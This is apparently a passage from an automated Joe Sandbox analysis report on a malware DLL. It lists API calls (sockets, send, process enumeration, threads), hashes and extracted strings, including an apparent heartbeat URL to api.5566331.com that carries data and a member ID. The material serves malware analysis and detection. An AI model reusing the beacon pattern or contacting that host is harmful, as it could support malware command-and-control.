                                                      • API ID: H_prolog$Time_free_memmove_sprintf$FileSystem__aulldiv__time64
                                                      • String ID: /index.php/inface/Heart/index?data=%s&member_id=%s&time=%d$api.5566331.com
                                                      • API String ID: 2351994653-2092688287
                                                      • Opcode ID: 626b145d63955841b4a1afe3d22c751e65f09e0913bd5877de186f72f53edca2
                                                      • Instruction ID: 883e9699974774e929dbfcc03b4e97d480afeffec36dd8d9086cd3d6d81822b8
                                                      • Opcode Fuzzy Hash: 626b145d63955841b4a1afe3d22c751e65f09e0913bd5877de186f72f53edca2
                                                      • Instruction Fuzzy Hash: EF816F75D00158EEDB25DBA4CC91BEDB7B8EF14340F5081AAE40A63146EF706B89CFA1
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _sprintf$H_prolog
                                                      • String ID: %s%d%d%d$zz45495*&*%d%d%d
                                                      • API String ID: 259905005-2271766065
                                                      • Opcode ID: 1868276e222430b0711a32a24c337b96d9a80714155d2067a2ff2d2d06dfe0d6
                                                      • Instruction ID: f1d4c3c9667547648429a607cca681a9e57cf3c8f04ea2054e519e06e169c46a
                                                      • Opcode Fuzzy Hash: 1868276e222430b0711a32a24c337b96d9a80714155d2067a2ff2d2d06dfe0d6
                                                      • Instruction Fuzzy Hash: 24316D76C00648BFDB02DFE8C8419DEB7B9EF19300F408466FA15B7052DB71AA09CBA1
                                                      APIs
                                                      Strings
                                                      • Error (%s) in line: %d in file: %s, xrefs: 10017AAF
                                                      • property.length() > 0 && value.length() > 0, xrefs: 10017AAA
                                                      • inc\http\HttpConnection.cpp, xrefs: 10017AA3
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog_wprintf
                                                      • String ID: Error (%s) in line: %d in file: %s$inc\http\HttpConnection.cpp$property.length() > 0 && value.length() > 0
                                                      • API String ID: 2247797838-1198884184
                                                      • Opcode ID: 371f25e065dc004a750377dc6d8794cbd2b88cbe2486646344ded18cddad5460
                                                      • Instruction ID: 8e15a67093e9226085e99b1e866dbffcfd67afb35c3a21f603de68190b18a0af
                                                      • Opcode Fuzzy Hash: 371f25e065dc004a750377dc6d8794cbd2b88cbe2486646344ded18cddad5460
                                                      • Instruction Fuzzy Hash: 0501F9355000047BE701EA04CC12FFE736DDF907A0F40022BB915971D6CFB8AB4682A6
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 100369AC
                                                      • GetProcAddress.KERNEL32(00000000), ref: 100369B3
                                                      • EncodePointer.KERNEL32(00000000), ref: 100369BF
                                                      • DecodePointer.KERNEL32(00000001), ref: 100369DC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                      • String ID: RoInitialize$combase.dll
                                                      • API String ID: 3489934621-340411864
                                                      • Opcode ID: 1131baf758f969b5486045358364ea536160914facfa0b82cba98193dee1e59f
                                                      • Instruction ID: 5f4c3249436c78f0982b856506d81eda569677dcd8857e6d54f84e6395c525f4
                                                      • Opcode Fuzzy Hash: 1131baf758f969b5486045358364ea536160914facfa0b82cba98193dee1e59f
                                                      • Instruction Fuzzy Hash: 34E01738690261AAFB116BB0CC8CF993AA9F704B4BF11E120F205D90E0EBB044489F01
                                                      APIs
                                                        • Part of subcall function 10001E92: _memmove.LIBCMT ref: 10001EF7
                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 100273D1
                                                      • GetCurrentThreadId.KERNEL32 ref: 1002756D
                                                      • CreateThread.KERNEL32(00000000,00000000,1002F0F0,?,00000000,00000000), ref: 10027597
                                                      • Sleep.KERNEL32(0000000A,?,?,?,?,93656AD3,?,00000000,?), ref: 100275AE
                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 100275BE
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageThread$CreateCurrentSleep_memmove
                                                      • String ID:
                                                      • API String ID: 3715655313-0
                                                      • Opcode ID: 932e180da84364583c5f899cf78d1e37845a735c11b60457a92f8378c03e2deb
                                                      • Instruction ID: 20035363636fbff4d5577a0cf27411d17544e9d07305abe0b436cc653ffae869
                                                      • Opcode Fuzzy Hash: 932e180da84364583c5f899cf78d1e37845a735c11b60457a92f8378c03e2deb
                                                      • Instruction Fuzzy Hash: 69C1AC31A002559FDB01DFA8CC55BAEBFB1FB05310FD44269E80A6B6D2CBB5AD41CB91
                                                      APIs
                                                        • Part of subcall function 100416EE: __getptd_noexit.LIBCMT ref: 100416EF
                                                        • Part of subcall function 100416EE: __amsg_exit.LIBCMT ref: 100416FC
                                                      • __invoke_watson.LIBCMT ref: 1004A58B
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: __amsg_exit__getptd_noexit__invoke_watson
                                                      • String ID:
                                                      • API String ID: 175857852-0
                                                      • Opcode ID: aea847968919292bc6357b8ebe2661733b33d75d60a3ac7339ff3a8988b4020b
                                                      • Instruction ID: 1d3f45d9d31e3010abf2b66f438840b9e2b7bc4b933bb305e85ec94c22506c0b
                                                      • Opcode Fuzzy Hash: aea847968919292bc6357b8ebe2661733b33d75d60a3ac7339ff3a8988b4020b
                                                      • Instruction Fuzzy Hash: 1971F5765006129EEB15DB24CC86B6B77ECEF82351F2480B9FD05DA086FB74EE848764
                                                      APIs
                                                      • EnterCriticalSection.KERNEL32(?), ref: 10026961
                                                      • LeaveCriticalSection.KERNEL32(?), ref: 100269C0
                                                      • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,93656AD3,?,76A85E10,7591DF10), ref: 10026A19
                                                      • EnterCriticalSection.KERNEL32(?,00000000,93656AD3,?,76A85E10,7591DF10), ref: 10026A2B
                                                      • LeaveCriticalSection.KERNEL32(?), ref: 10026A6A
                                                      • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,93656AD3,?,76A85E10,7591DF10), ref: 10026AA2
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$EnterFreeHeapLeave
                                                      • String ID:
                                                      • API String ID: 3296397286-0
                                                      • Opcode ID: 2be9ed52d4ef0489d305100fcdcedbd2f48dc47cfc3401de3809552b2046b69d
                                                      • Instruction ID: 69b54cbec9c2a2cf239ea5cb71a4ebdbed0f90427bed276832e92f5eea82da01
                                                      • Opcode Fuzzy Hash: 2be9ed52d4ef0489d305100fcdcedbd2f48dc47cfc3401de3809552b2046b69d
                                                      • Instruction Fuzzy Hash: D9417975900215EFDB01CF58ED84BDABBF8FF48350F54826AEC19AB295DB316844CBA0
                                                      APIs
                                                      • InterlockedCompareExchange.KERNEL32(?,00000000,00000001), ref: 1002446C
                                                      • EnterCriticalSection.KERNEL32(?,?,10023CE5,?,?,10023A1C,?,?,00000000,?,?,?,1002383D,?,?,?), ref: 10024482
                                                      • LeaveCriticalSection.KERNEL32(?,?,10023CE5,?,?,10023A1C,?,?,00000000,?,?,?,1002383D,?,?,?), ref: 10024491
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$CompareEnterExchangeInterlockedLeave
                                                      • String ID:
                                                      • API String ID: 3376869089-0
                                                      • Opcode ID: dcc36ad9bd771d17ef28f73011b240de4ec1de8bbacbd241ae23c05e860aa736
                                                      • Instruction ID: e1103fb16bcf34c27b6bba3f82fa35d23c377cf532448162990da8c687367291
                                                      • Opcode Fuzzy Hash: dcc36ad9bd771d17ef28f73011b240de4ec1de8bbacbd241ae23c05e860aa736
                                                      • Instruction Fuzzy Hash: 1531CF72A04B65EFD701CF84E885B99F7F8FB04725F91422AF90993680CB75AD50CBA0
                                                      APIs
                                                        • Part of subcall function 1001F470: HeapFree.KERNEL32(?,00000000,?), ref: 1001F4C4
                                                      • EnterCriticalSection.KERNEL32(?,93656AD3,?,?,?,?,00000000,10050D58,000000FF), ref: 10026C92
                                                      • _free.LIBCMT ref: 10026CA7
                                                        • Part of subcall function 10033984: RtlFreeHeap.NTDLL(00000000,00000000,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 10033998
                                                        • Part of subcall function 10033984: GetLastError.KERNEL32(?,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 100339AA
                                                      • ResetEvent.KERNEL32(?,?,?,?,?,00000000,10050D58,000000FF), ref: 10026CD0
                                                      • ResetEvent.KERNEL32(?,?,?,?,?,00000000,10050D58,000000FF), ref: 10026CD8
                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,?,00000000,10050D58,000000FF), ref: 10026D62
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalEventFreeHeapResetSection$EnterErrorLastLeave_free
                                                      • String ID:
                                                      • API String ID: 813198115-0
                                                      • Opcode ID: 121b09cc14e230c83955a259428a73d89a7680d91248fd021a20475fc6d8366c
                                                      • Instruction ID: 04441b3ce9a095c04100b976fa77d271efc0422afdafd5dc7e5adaf5cc78714d
                                                      • Opcode Fuzzy Hash: 121b09cc14e230c83955a259428a73d89a7680d91248fd021a20475fc6d8366c
                                                      • Instruction Fuzzy Hash: DD316D75600244DFDB45DF28C898B9ABBF4FF49324F5081AAE8188F296DB75A804CF90
                                                      APIs
                                                      • InterlockedExchangeAdd.KERNEL32(?,?), ref: 10024718
                                                      • WSASend.WS2_32(1002383D,?,00000001,?,00000000,?,00000000), ref: 10024748
                                                      • WSAGetLastError.WS2_32 ref: 10024753
                                                      • InterlockedDecrement.KERNEL32(00000002), ref: 10024763
                                                      • HeapFree.KERNEL32(?,00000000,?,?), ref: 10024793
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Interlocked$DecrementErrorExchangeFreeHeapLastSend
                                                      • String ID:
                                                      • API String ID: 930714758-0
                                                      • Opcode ID: 1972da9f65ab38ca626a1e8a79e267d2f0406b4080d14df9bbeb91a1dbdcfa2f
                                                      • Instruction ID: c9feec93b76c13933b9d7088ce872dbd55c535b4e7aa2b00c7f86bf33a32e45e
                                                      • Opcode Fuzzy Hash: 1972da9f65ab38ca626a1e8a79e267d2f0406b4080d14df9bbeb91a1dbdcfa2f
                                                      • Instruction Fuzzy Hash: 1231BE761013109FE760CF25E888B9677F8FF09340F828669ED598B295DB71E804CFA0
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$CloseHandle
                                                      • String ID:
                                                      • API String ID: 1525775657-0
                                                      • Opcode ID: 1b246619cf74dc254d483b4a0201465356ea0d2d7e34e570287148875704c418
                                                      • Instruction ID: 38b56e7584fb66d25564bdbf6a4c7f13ba84eb432b6331f33e900c25f280b608
                                                      • Opcode Fuzzy Hash: 1b246619cf74dc254d483b4a0201465356ea0d2d7e34e570287148875704c418
                                                      • Instruction Fuzzy Hash: 9F31E934111B019BE324EB35D895BEAF3E4EF54381F418D2EE0AB8A156DF70BA85CA50
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 10010F09
                                                        • Part of subcall function 1000C213: __EH_prolog.LIBCMT ref: 1000C218
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 10010F6E
                                                      • Process32First.KERNEL32(00000000,?), ref: 10010F8C
                                                      • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 10010FD2
                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 10011011
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prologProcess32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                      • String ID:
                                                      • API String ID: 3748986744-0
                                                      • Opcode ID: 5270075dfac5b8a49d61a256878c69d8e1ea876c9273c87fc0bc4189ec04c9c8
                                                      • Instruction ID: 78b35f7e6756fe4e50e7ea57a4b403130daab9a31b4eaec1afd9b11dc3a3f1df
                                                      • Opcode Fuzzy Hash: 5270075dfac5b8a49d61a256878c69d8e1ea876c9273c87fc0bc4189ec04c9c8
                                                      • Instruction Fuzzy Hash: A631C175D01219EFEB10DFA4CC91AEEB7B8EF05390F008029F515A6191DB78AB85CF61
                                                      APIs
                                                      • socket.WS2_32(?,00000001,00000006), ref: 100236C3
                                                      • WSAGetLastError.WS2_32 ref: 10023720
                                                      • closesocket.WS2_32(?), ref: 10023749
                                                      • HeapFree.KERNEL32(00000000,00000000,?,?), ref: 10023769
                                                      • InterlockedDecrement.KERNEL32(?), ref: 10023776
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DecrementErrorFreeHeapInterlockedLastclosesocketsocket
                                                      • String ID:
                                                      • API String ID: 754258639-0
                                                      • Opcode ID: d441c2c743485f14048e4bd0b3a966edf42c9b5aa2b40ee60db7e82fef7b3bdd
                                                      • Instruction ID: e68d2a3abb1c95569ddef35404d751f8cd0bdbb6a0eb3d6bf00160ed96876589
                                                      • Opcode Fuzzy Hash: d441c2c743485f14048e4bd0b3a966edf42c9b5aa2b40ee60db7e82fef7b3bdd
                                                      • Instruction Fuzzy Hash: C7215CB560021AEFEB14DFA9D8C5AAABBB9FF08240F408069F905D7250DB71ED549B90
                                                      APIs
                                                      • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 100237B3
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 100237E8
                                                      • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 10023816
                                                      • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,00000000), ref: 10023820
                                                      • GetCurrentThreadId.KERNEL32 ref: 10023844
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$CompletionCurrentOverlappedQueuedResultStatusThread
                                                      • String ID:
                                                      • API String ID: 1563818880-0
                                                      • Opcode ID: 012cc377695a579ce0bd0f3af0e9d1dca6484571d372545beed0980e8a3ef0c7
                                                      • Instruction ID: b9f087724994e0516a15b4b33f3d58088258f4b915a02b4dceb28d6e58c93e85
                                                      • Opcode Fuzzy Hash: 012cc377695a579ce0bd0f3af0e9d1dca6484571d372545beed0980e8a3ef0c7
                                                      • Instruction Fuzzy Hash: FE216BB5A00219FFDF11CFA4D8849AEBBB8FF48290F40855AF916D7250DB30AA04DB91
                                                      APIs
                                                      • EnterCriticalSection.KERNEL32(?,00000000,00000001,?,?,100269E3,00000000,93656AD3,?,76A85E10,7591DF10), ref: 10026AE1
                                                      • send.WS2_32(?,?,?,00000000), ref: 10026AFE
                                                      • LeaveCriticalSection.KERNEL32(?,?,100269E3,00000000,93656AD3,?,76A85E10,7591DF10), ref: 10026B11
                                                      • SetLastError.KERNEL32(00000000,?,100269E3,00000000,93656AD3,?,76A85E10,7591DF10), ref: 10026B1D
                                                      • WSAGetLastError.WS2_32(?,100269E3,00000000,93656AD3,?,76A85E10,7591DF10), ref: 10026B6B
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalErrorLastSection$EnterLeavesend
                                                      • String ID:
                                                      • API String ID: 421069059-0
                                                      • Opcode ID: 25a34f9671bf7da85fe1546c299b962e5dac4595aaec4376653f16ab33c01647
                                                      • Instruction ID: 196f02ec29e4ada0d307ae28afdeaf4269b163a7df2c7b5fa27b3b824c8cc6d7
                                                      • Opcode Fuzzy Hash: 25a34f9671bf7da85fe1546c299b962e5dac4595aaec4376653f16ab33c01647
                                                      • Instruction Fuzzy Hash: F0219036200605AFD705CF68D9D8A9A7BB5FF88360F108169EC09CB291DB30F991CBA0
                                                      APIs
                                                      • _malloc.LIBCMT ref: 10034371
